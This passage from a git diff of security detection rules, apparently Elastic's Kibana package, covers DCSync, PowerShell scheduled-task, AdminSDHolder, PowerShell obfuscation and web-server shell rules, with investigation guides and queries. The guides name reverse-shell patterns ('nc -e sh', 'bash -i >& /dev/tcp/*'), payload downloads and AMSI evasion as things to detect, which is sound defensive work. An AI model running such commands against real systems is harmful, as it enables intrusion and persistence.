accounts on Azure AD Connect; investigate if this is part of a new Azure AD account setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n- Although replicating Active Directory (AD) data to non-Domain Controllers is not a common practice and is generally not recommended from a security perspective, some software vendors may require it for their products to function correctly. Investigate if this is part of a new product setup, and ensure it is properly secured. If the activity was expected and there is no other suspicious activity involving the host or user, the analyst can dismiss the alert.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the entire domain or the `krbtgt` user was compromised:\n - Activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the `krbtgt` user.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.code:\"4662\" and winlog.event_data.Properties:(\n *DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or\n *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or\n *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and\n not winlog.event_data.SubjectUserName:(*$ or MSOL_*)\n", - "references": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-180815210510.html", - "https://threathunterplaybook.com/library/windows/active_directory_replication.html?highlight=dcsync#directory-replication-services-auditing", - "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/builtin/security/win_ad_replication_non_machine_account.yml", - "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0027_windows_audit_directory_service_access.md", - "https://attack.stealthbits.com/privilege-escalation-using-mimikatz-dcsync", - "https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" - ], - "related_integrations": [ - { - "package": "windows", - "version": "^2.0.0" - }, - { - "package": "system", - "version": "^1.6.4" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Properties", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.SubjectUserName", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def", - "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access (Success,Failure)\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Privilege Escalation", - "Use Case: Active Directory Monitoring", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1003", - "name": "OS Credential Dumping", - "reference": "https://attack.mitre.org/techniques/T1003/", - "subtechnique": [ - { - "id": "T1003.006", - "name": "DCSync", - "reference": "https://attack.mitre.org/techniques/T1003/006/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0004", - "name": "Privilege Escalation", - "reference": "https://attack.mitre.org/tactics/TA0004/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "new_terms", - "version": 115 - }, - "id": "5c6f4c58-b381-452a-8976-f1b1c6aa0def_115", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_210.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_210.json deleted file mode 100644 index 50de6f63063..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_210.json +++ /dev/null @@ -1,141 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks.", - "false_positives": [ - "Legitimate scheduled tasks may be created during installation of new software." - ], - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.library-*", - "logs-endpoint.events.network-*", - "logs-windows.sysmon_operational-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Outbound Scheduled Task Activity via PowerShell", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Outbound Scheduled Task Activity via PowerShell\n\nPowerShell, a powerful scripting language in Windows, can automate tasks via the Task Scheduler. Adversaries exploit this by creating scheduled tasks to execute malicious scripts, facilitating lateral movement or remote discovery. The detection rule identifies suspicious PowerShell activity by monitoring for the Task Scheduler DLL load and subsequent outbound RPC connections, signaling potential misuse.\n\n### Possible investigation steps\n\n- Review the alert details to identify the specific host.id and process.entity_id associated with the suspicious activity.\n- Examine the process execution history on the affected host to determine if the PowerShell process (powershell.exe, pwsh.exe, or powershell_ise.exe) has executed any unexpected or unauthorized scripts.\n- Check the network logs for the host to identify any unusual or unauthorized outbound RPC connections, particularly those targeting port 135, and verify if the destination addresses are legitimate and expected.\n- Investigate the context of the taskschd.dll library load by reviewing recent scheduled tasks on the host to identify any newly created or modified tasks that could be linked to the alert.\n- Correlate the alert with other security events or logs from the same host or network segment to identify any patterns or additional indicators of compromise that may suggest lateral movement or remote discovery attempts.\n\n### False positive analysis\n\n- Legitimate administrative tasks using PowerShell may trigger the rule if they involve loading the Task Scheduler DLL and making RPC connections. To manage this, identify and whitelist specific scripts or processes that are known to perform these actions regularly.\n- Automated system maintenance or monitoring tools might also load the Task Scheduler DLL and establish RPC connections. Review these tools and exclude their process IDs or hashes from the detection rule to prevent false alerts.\n- Software updates or installations that use PowerShell scripts could mimic the behavior detected by the rule. Monitor update schedules and temporarily disable the rule during these periods if necessary, or create exceptions for known update processes.\n- Developers or IT staff using PowerShell for legitimate remote management tasks may inadvertently trigger the rule. Implement user-based exceptions for trusted personnel or restrict the rule to non-administrative accounts to reduce false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately from the network to prevent further lateral movement or data exfiltration.\n- Terminate the suspicious PowerShell process identified in the alert to stop any ongoing malicious activity.\n- Conduct a forensic analysis of the affected system to identify any additional malicious scheduled tasks or scripts and remove them.\n- Review and clean up any unauthorized scheduled tasks created on the system to ensure no persistence mechanisms remain.\n- Reset credentials for any accounts that were used or potentially compromised during the incident to prevent unauthorized access.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine the scope of the attack.\n- Implement enhanced monitoring for similar PowerShell and scheduled task activities across the network to detect and respond to future threats promptly.", - "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [network where host.os.type == \"windows\" and process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and destination.port == 135 and not destination.address in (\"127.0.0.1\", \"::1\")]\n", - "references": [ - "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", - "https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^8.2.0" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "destination.address", - "type": "keyword" - }, - { - "ecs": true, - "name": "destination.port", - "type": "long" - }, - { - "ecs": true, - "name": "dll.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.entity_id", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "5cd55388-a19c-47c7-8ec4-f41656c2fded", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1053", - "name": "Scheduled Task/Job", - "reference": "https://attack.mitre.org/techniques/T1053/", - "subtechnique": [ - { - "id": "T1053.005", - "name": "Scheduled Task", - "reference": "https://attack.mitre.org/techniques/T1053/005/" - } - ] - }, - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 210 - }, - "id": "5cd55388-a19c-47c7-8ec4-f41656c2fded_210", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_109.json index b355b6b7ac7..b65a9417ac0 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_210.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_210.json index b1336c129df..a257ed72ea9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_210.json +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/60c814fc-7d06-11f0-b326-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/60c814fc-7d06-11f0-b326-f661ea17fbcd_1.json index 610f39d605c..7cf63b4e912 100644 --- a/packages/security_detection_engine/kibana/security_rule/60c814fc-7d06-11f0-b326-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/60c814fc-7d06-11f0-b326-f661ea17fbcd_1.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_210.json b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_210.json index 100e91a89cd..fa9b7c5d2a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_210.json +++ b/packages/security_detection_engine/kibana/security_rule/60f3adec-1df9-4104-9c75-b97d9f078b25_210.json @@ -24,7 +24,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214.json b/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214.json deleted file mode 100644 index 11d5e3b5290..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214.json +++ /dev/null @@ -1,98 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "AdminSDHolder SDProp Exclusion Added", - "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "any where event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", - "references": [ - "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", - "https://petri.com/active-directory-security-understanding-adminsdholder-object" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeLDAPDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "winlog.event_data.AttributeValue", - "type": "unknown" - } - ], - "risk_score": 73, - "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", - "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Active Directory", - "Resources: Investigation Guide", - "Use Case: Active Directory Monitoring", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/", - "subtechnique": [ - { - "id": "T1078.002", - "name": "Domain Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/002/" - } - ] - }, - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 214 - }, - "id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7_214", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_7.json b/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_7.json new file mode 100644 index 00000000000..8eebc433e62 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/64f17c52-6c6e-479e-ba72-236f3df18f3d_7.json @@ -0,0 +1,178 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies PowerShell scripts that use invalid escape sequences as a form of obfuscation. This technique introduces backticks (`) between characters in a way that does not correspond to valid PowerShell escape sequences, breaking up strings and bypassing pattern-based detections while preserving execution logic. This is designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", + "from": "now-9m", + "language": "esql", + "license": "Elastic License v2", + "name": "Potential PowerShell Obfuscation via Invalid Escape Sequences", + "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Invalid Escape Sequences\n\nPowerShell, a powerful scripting language in Windows environments, can be exploited by adversaries using obfuscation techniques to evade detection. By inserting invalid escape sequences, attackers can obscure malicious scripts, bypassing static analysis and security tools like AMSI. The detection rule identifies such obfuscation by analyzing script patterns, specifically targeting unusual backtick usage, to flag potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the context and content of the script block that triggered the alert. Look for patterns of invalid escape sequences and assess whether they appear intentionally obfuscated.\n- Examine the `file.name` and `file.path` fields to determine the origin and location of the script. This can help identify whether the script is part of a legitimate application or potentially malicious.\n- Check the `host.name` and `agent.id` fields to identify the affected system and the agent responsible for logging the event. This information is crucial for understanding the scope of the potential threat.\n- Analyze the `user.id` field to ascertain which user executed the script. This can provide insights into whether the user has a history of executing suspicious scripts or if their account may be compromised.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related script blocks, which may reveal additional obfuscation or malicious activity.\n- Assess the `count` field to evaluate the extent of obfuscation detected. A higher count may indicate more aggressive obfuscation techniques, warranting further scrutiny.\n\n### False positive analysis\n\n- Scripts from Visual Studio Code's PowerShell extension may trigger false positives due to its shell integration. To handle this, exclude scripts containing the pattern \"$([char]0x1b)]633\" from detection.\n- PowerShell modules with names starting with \"TSS_\" may be flagged incorrectly. Exclude these by adding a condition to ignore files matching the pattern \"TSS_*.psm1\".\n- Legitimate scripts that use backticks for formatting or other non-obfuscation purposes might be detected. Review such scripts and, if verified as safe, add them to an exception list based on their script block ID or file path.\n- Regularly update the exclusion list to reflect changes in legitimate script usage patterns, ensuring that new false positives are addressed promptly.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent lateral movement and further execution of potentially malicious scripts. Disconnect the host from the network and disable remote access.\n\n- Analyze the script block text and file path to identify the source and nature of the obfuscated script. Determine if the script is part of a larger attack or if other systems are affected.\n\n- Remove or quarantine the identified malicious script and any associated files from the host. Ensure that all remnants of the obfuscated code are eliminated to prevent re-execution.\n\n- Conduct a thorough scan of the host using updated antivirus and antimalware tools to detect and remove any additional threats or indicators of compromise.\n\n- Review and update PowerShell execution policies and security settings to restrict the execution of scripts with invalid escape sequences. Implement stricter controls to prevent similar obfuscation techniques.\n\n- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and monitoring. Provide detailed logs and findings to assist in understanding the scope and impact of the threat.\n\n- Implement enhanced logging and monitoring for PowerShell activities across the network to detect and respond to similar obfuscation attempts promptly. Use the identified patterns to refine detection capabilities.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*`*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[A-Za-z0-9_-]`(?![rntb]|\\r|\\n|\\d)[A-Za-z0-9_-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.name,\n file.directory,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least 10 times\n| where Esql.script_block_pattern_count >= 10\n\n| where file.name not like \"TSS_*.psm1\"\n // ESQL requires this condition, otherwise it only returns matches where file.name exists.\n or file.name is null\n\n// VSCode Shell integration\n| where not powershell.file.script_block_text like \"*$([char]0x1b)]633*\"\n\n| where not file.directory == \"C:\\\\Program Files\\\\MVPSI\\\\JAMS\\\\Agent\\\\Temp\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory is null\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.directory", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "64f17c52-6c6e-479e-ba72-236f3df18f3d", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 7 + }, + "id": "64f17c52-6c6e-479e-ba72-236f3df18f3d_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/65f28c4d-cfc8-4847-9cca-f2fb1e319151_1.json b/packages/security_detection_engine/kibana/security_rule/65f28c4d-cfc8-4847-9cca-f2fb1e319151_1.json new file mode 100644 index 00000000000..e2b75b1c301 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/65f28c4d-cfc8-4847-9cca-f2fb1e319151_1.json @@ -0,0 +1,167 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule leverages the \"new_terms\" rule type to detect unusual command executions originating from web server processes on Linux systems. Attackers may exploit web servers to maintain persistence on a compromised system, often resulting in atypical command executions. As command execution from web server parent processes is common, the \"new_terms\" rule type approach helps to identify deviations from normal behavior.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Unusual Web Server Command Execution", + "new_terms_fields": [ + "process.command_line" + ], + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Unusual Web Server Command Execution\n\nThis rule detects shells invoked by web server processes on Linux to run one-off commands, surfacing command lines the server has never executed before. Attackers exploit vulnerable apps or dropped webshells to launch bash -c from web roots, e.g., download a payload with wget/curl into /opt or /tmp, chmod +x and execute it, or open a reverse shell (nc -e sh) to implant services or cron-like tasks and persist under the web server account.\n\n### Possible investigation steps\n\n- Reconstruct the process tree around the event to identify the shell payload and parent service, determine if it chains downloads, reverse shells, or archive extraction, and hash/snapshot any referenced files.\n- Pivot to web server access and error logs at the timestamp to identify the request path, client IP, user agent, and HTTP verb that triggered execution, noting anomalies like POST uploads, long query strings, or 500s.\n- List and diff newly created or recently modified files under common web roots and application directories around the event time, looking for webshells, chmod+x artifacts, .php/.jsp backdoors, or systemd/cron writes by the same user.\n- Correlate with network telemetry to see if the web tier opened outbound connections or listeners (nc, bash -i, curl/wget), and capture any active sockets and destinations for rapid containment.\n- Validate whether the command matches expected maintenance tasks for the application (e.g., wkhtmltopdf or image processing), and if not, isolate the process and host while scoping for the same pattern across other servers and preserving volatile evidence.\n\n### False positive analysis\n\n- A legitimate web-admin workflow (plugin/module install, content import, or cache warmup) spawns sh -c from an apache/nginx parent in /var/www to run tar/chmod/chown steps, producing a command line the host has not previously executed under www-data.\n- A recently deployed application feature performs server-side document or image processing and rotates logs by calling sh -c from a framework parent (flask/rails/php) with a working directory in /opt or /usr/share/nginx, making the specific shell invocation a new term for this server.\n\n### Response and remediation\n\n- Quarantine the affected web server by removing it from the load balancer, stopping apache/nginx/httpd, and killing the spawned shell (e.g., bash -c) while capturing /proc//cmdline and /proc//environ, lsof, and active sockets for evidence.\n- Block outbound egress from the web server account and immediately deny destinations contacted by curl/wget or reverse shells (nc, bash -i to /dev/tcp), and rotate exposed API keys or credentials referenced in the command line.\n- Eradicate persistence by deleting newly dropped or modified files under /var/www, /usr/share/nginx, /srv/http, /opt, or /home/*/public_html (webshells, .php backdoors), removing downloaded binaries from /tmp or /opt, and cleaning cron/systemd units created by www-data/nginx.\n- Recover by restoring web content and application code from known-good backups or images, verifying file ownership and permissions, and restarting the service with monitored command allowlists and file integrity checks.\n- Escalate to full incident response and forensic imaging if any reverse shell artifacts (nc -e sh, bash -i >& /dev/tcp/*), privileged writes (/etc/systemd/system/*.service, /var/spool/cron/*), or sudo execution by the web server user are observed.\n- Harden by disabling risky exec paths (PHP exec/system/shell_exec and unsafe plugins), enforcing noexec,nodev,nosuid mounts on web roots, applying SELinux/AppArmor confinement to web processes, narrowing outbound egress, and deploying WAF/mod_security rules for upload and RCE vectors.\n", + "query": "event.category:process and 